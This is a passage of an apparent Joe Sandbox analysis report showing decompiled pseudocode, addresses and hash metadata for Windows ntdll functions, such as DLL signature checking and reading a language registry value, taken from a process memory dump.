				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04BDCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04BCC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4cb5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04C45510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4cb5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04BE7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04BE7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04C47016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04BE7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04BE7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04C47016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04BFA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04BCB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















              0x04bd7e4c
              0x04bd7e50
              0x04bd7e55
              0x04bd7e58
              0x04bd7e5d
              0x04bd7e71
              0x04bd7f33
              0x04bd7e77
              0x04bd7e77
              0x04bd7e79
              0x04bd7e79
              0x04bd7e7e
              0x04bd7f45
              0x04c29848
              0x00000000
              0x04c29848
              0x04bd7f4e
              0x04bd7f53
              0x04bd7f5a
              0x00000000
              0x00000000
              0x04c2985a
              0x04c29862
              0x04c29866
              0x00000000
              0x04c2986c
              0x00000000
              0x04c2986c
              0x04bd7e84
              0x04bd7e84
              0x04bd7e8d
              0x04c29871
              0x04bd7eb8
              0x04bd7ec0
              0x04bd7ec0
              0x04bd7e9a
              0x04c2987e
              0x00000000
              0x00000000
              0x04c29884
              0x04c2988b
              0x04c298a7
              0x04c298ac
              0x04c298b1
              0x04c298b6
              0x04c298b8
              0x04c298b8
              0x04c298b9
              0x00000000
              0x04c298b9
              0x04bd7ea0
              0x04bd7ea7
              0x00000000
              0x00000000
              0x04bd7eac
              0x04bd7eb1
              0x04bd7ec6
              0x04bd7ed0
              0x04c298cc
              0x04bd7ed6
              0x04bd7ed6
              0x04bd7ed6
              0x04bd7ede
              0x04bd7ee3
              0x04c298e3
              0x04c298f0
              0x04c29902
              0x04c298f2
              0x04c298fb
              0x04c298fb
              0x04c29907
              0x04c2991d
              0x04c2991d
              0x04c29907
              0x04c298e3
              0x04bd7ef0
              0x04bd7f14
              0x04bd7f14
              0x04bd7f1e
              0x04c29946
              0x04bd7f24
              0x04bd7f24
              0x04bd7f24
              0x04bd7f2c
              0x04c2996a
              0x04c29975
              0x04c29975
              0x04c2997e
              0x04c29993
              0x04c29993
              0x04c2997e
              0x00000000
              0x04bd7ef2
              0x04bd7efc
              0x04bd7f0a
              0x04bd7f0e
              0x04c29933
              0x00000000
              0x04c29933
              0x00000000
              0x04bd7f0e
              0x00000000
              0x00000000
              0x00000000
              0x04bd7eb1

              Strings
              • LdrpCompleteMapModule, xrefs: 04C29898
              • Could not validate the crypto signature for DLL %wZ, xrefs: 04C29891
              • minkernel\ntdll\ldrmap.c, xrefs: 04C298A2
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
              • API String ID: 0-1676968949
              • Opcode ID: 83f4404c43026b231cc18bac563880571b03702cae3d40ca065de47aa03ebdba
              • Instruction ID: a0b580067f6c78be148241ff5cb472a326b88743ee3f42ca4cf7cc92bc0648a2
              • Opcode Fuzzy Hash: 83f4404c43026b231cc18bac563880571b03702cae3d40ca065de47aa03ebdba
              • Instruction Fuzzy Hash: CF5113717007559BEB25CF68CA44BAAB7E9EB40314F040AD9E8559B7E1EB70FD00CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BCE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E04BCE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04BCF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04C095D0();
						}
						if(_t78 != 0) {
							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04C0FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04C0BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04C09600();
					if(_t97 < 0) {
						goto L6;
					}
					E04C0BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04BCF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04C0BB40(_t83, _t102 + 0x24, _t78);
								if(L04BD43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04C0BB40(_t84, _t102 + 0x24, _t94);
									if(L04BD43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































              0x04bce620
              0x04bce628
              0x04bce62f
              0x04bce631
              0x04bce635
              0x04bce637
              0x04bce63e
              0x04c25503
              0x04c25503
              0x04bce64c
              0x04bce64c
              0x04bce651
              0x00000000
              0x00000000
              0x04bce661
              0x04bce665
              0x04c2542a
              0x04bce715
              0x04bce71a
              0x04bce71c
              0x04bce720
              0x04bce720
              0x04bce727
              0x04bce736
              0x04bce736
              0x04bce743
              0x04bce743
              0x04bce673
              0x04bce678
              0x04bce67d
              0x04bce682
              0x04bce685
              0x04bce692
              0x04bce69b
              0x04bce6a3
              0x04bce6ad
              0x04bce6b1
              0x04bce6b2
              0x04bce6bb
              0x04bce6bf
              0x04bce6c0
              0x04bce6c8
              0x04bce6cc
              0x04bce6d5
              0x04bce6d9
              0x00000000
              0x00000000
              0x04bce6e5
              0x04bce6ea
              0x04bce6f9
              0x04bce70b
              0x04bce70f
              0x04c25439
              0x04c2545e
              0x04c2545e
              0x00000000
              0x04c2545e
              0x04c2543b
              0x04c2543e
              0x04c25440
              0x04c25445
              0x04c25472
              0x04c25475
              0x04c2548d
              0x04c25493
              0x04c254a9
              0x00000000
              0x00000000
              0x04c254ab
              0x04c254b4
              0x04c254bc
              0x04c254c8
              0x04c254de
              0x04c254fb
              0x04c254e0
              0x04c254e6
              0x04c254eb
              0x04c254eb
              0x04c254de
              0x00000000
              0x04c254bc
              0x04c25477
              0x04c2547a
              0x04c25480
              0x04c25483
              0x04c25486
              0x04c2548b
              0x00000000
              0x00000000
              0x00000000
              0x04c2548b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04c25447
              0x04c25447
              0x04c25447
              0x04c25447
              0x04c2544e
              0x00000000
              0x00000000
              0x04c25450
              0x04c25452
              0x04c25455
              0x04c2545a
              0x00000000
              0x00000000
              0x00000000
              0x04c2545c
              0x04c2546a
              0x04c2546d
              0x04c2546f
              0x00000000
              0x04c2546f
              0x04bce70f

              Strings
              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04BCE68C
              • InstallLanguageFallback, xrefs: 04BCE6DB
              • @, xrefs: 04BCE6C0
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
              • API String ID: 0-1757540487
              • Opcode ID: 7eea894bfd9b3c095852ec6b361f9a8d70d07ce89d2958fe54038d9793a65c80
              • Instruction ID: 471873c49823c00f0bc6a8124ff93de754e76da2d114d5fa5fc402945bf22529
              • Opcode Fuzzy Hash: 7eea894bfd9b3c095852ec6b361f9a8d70d07ce89d2958fe54038d9793a65c80
              • Instruction Fuzzy Hash: 9751B2B6508365ABD714DF64C480A6BB3E9BF88714F05096EF989D7240FB74FA04C7A2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BCB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 78%
              			E04BCB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4c9f7a8);
				E04C1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04C1D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04C0D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04C0F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04C1DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04C0B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04C0B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04C0E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04C0A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















              0x04bcb171
              0x04bcb171
              0x04bcb171
              0x04bcb171
              0x04bcb171
              0x04bcb176
              0x04bcb17b
              0x04bcb180
              0x04bcb186
              0x04bcb18f
              0x04bcb198
              0x04bcb1a4
              0x04bcb1aa
              0x04c24802
              0x04c24802
              0x04c24805
              0x04c2480c
              0x04c2480e
              0x04bcb1d1
              0x04bcb1d3
              0x04bcb1de
              0x04bcb1de
              0x04c24817
              0x04c2481e
              0x04c24820
              0x04c24822
              0x04c24822
              0x04c24824
              0x04c24824
              0x04c2482a
              0x00000000
              0x00000000
              0x04c24835
              0x04c2483a
              0x04c2483d
              0x04c2483f
              0x04c24842
              0x04c24842
              0x04c24842
              0x04c24846
              0x04c2484c
              0x04c2484e
              0x04c24851
              0x04c24851
              0x04c24853
              0x04c24854
              0x04c24854
              0x04c24858
              0x04c2485a
              0x04c2485a
              0x04c2485d
              0x04c2485f
              0x04c24861
              0x04c24861
              0x04c24866
              0x04c2486b
              0x04c2486e
              0x04c24871
              0x04c24876
              0x04c24876
              0x04c24878
              0x04c2487b
              0x04c24884
              0x04c24884
              0x00000000
              0x04c2487d
              0x04c2487d
              0x04c24882
              0x04c24889
              0x04c24889
              0x04c2488f
              0x04c24891
              0x04c248e0
              0x04c248e2
              0x04c248e4
              0x04c248e4
              0x04c248e7
              0x04c248e7
              0x04c248ed
              0x04c248f4
              0x04c248f6
              0x04c24951
              0x04c24951
              0x04c24953
              0x04c24953
              0x04c24956
              0x04c24956
              0x04c24958
              0x04c24959
              0x04c24959
              0x04c2495d
              0x04c2495d
              0x04c2495f
              0x04c2495f
              0x04c24965
              0x04c24969
              0x04c249ba
              0x04c249ba
              0x04c249c1
              0x04c249c5
              0x04c249cc
              0x04c249d4
              0x04c249d7
              0x04c249da
              0x04c249e4
              0x04c249e5
              0x04c249f3
              0x04c24a02
              0x00000000
              0x04c24a02
              0x04c24972
              0x04c24974
              0x00000000
              0x00000000
              0x04c24976
              0x04c24979
              0x04c24982
              0x04c24983
              0x04c24984
              0x04c2498b
              0x04c2498d
              0x04c24991
              0x04c24993
              0x04c24999
              0x04c2499d
              0x04c249a2
              0x04c249a2
              0x04c249a2
              0x04c24999
              0x04c249ac
              0x00000000
              0x04c249b3
              0x04c248f8
              0x04c248fe
              0x00000000
              0x00000000
              0x00000000
              0x04c248fe
              0x04c24895
              0x04c2489c
              0x04c248ad
              0x04c248b2
              0x04c248b5
              0x04c248b7
              0x04c248ba
              0x04c248bc
              0x04c248c6
              0x04c248c6
              0x04c248cb
              0x04c248d1
              0x04c248d4
              0x04c248d8
              0x04c248d8
              0x00000000
              0x04c248d8
              0x04c248be
              0x04c248c0
              0x00000000
              0x00000000
              0x04c248c2
              0x00000000
              0x00000000
              0x00000000
              0x04c248c4
              0x00000000
              0x04c24882
              0x04c2487b
              0x04c24904
              0x04c24906
              0x00000000
              0x00000000
              0x04c24908
              0x04c2490e
              0x00000000
              0x00000000
              0x04c24910
              0x04c24917
              0x04c24917
              0x00000000
              0x04c24917
              0x04bcb1ba
              0x04c247f9
              0x04c247fc
              0x00000000
              0x00000000
              0x00000000
              0x04c247fc
              0x04bcb1c0
              0x04bcb1c0
              0x04bcb1c3
              0x04bcb1cb
              0x00000000
              0x00000000
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: _vswprintf_s
              • String ID:
              • API String ID: 677850445-0
              • Opcode ID: 5d255f35718bcc6f373c85e4b76b260733f4f92fcbc08be791717711c6d76432
              • Instruction ID: 8deade16c1ca03dd0206858c719ac750597c1dec27a2f587791c555589299d0d
              • Opcode Fuzzy Hash: 5d255f35718bcc6f373c85e4b76b260733f4f92fcbc08be791717711c6d76432
              • Instruction Fuzzy Hash: 0051F371D102798FEB39DF64C944BBEBBB2AF00714F1041ADD8599B281D7B06A419B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BEB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E04BEB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4cbd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04BE7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04C98CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04C09E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04C0B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04C0CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04BE7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04C98F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04C0AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4cb8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4cb862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4cb8628; // 0x0
							_t116 =  *0x4cb862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































              0x04beb94c
              0x04beb956
              0x04beb95c
              0x04beb95e
              0x04beb964
              0x04beb969
              0x04beb96d
              0x04beb96d
              0x04beb970
              0x04beb974
              0x04beb97a
              0x04bebadf
              0x04bebadf
              0x04bebae2
              0x04bebae4
              0x04bebae6
              0x04bebaf0
              0x04c32cb8
              0x04bebaf6
              0x04bebaf6
              0x04bebaf6
              0x04bebafd
              0x04bebb1f
              0x04bebb1f
              0x04bebaff
              0x04bebb00
              0x04bebb00
              0x04bebb03
              0x04bebb03
              0x04bebacb
              0x04bebacf
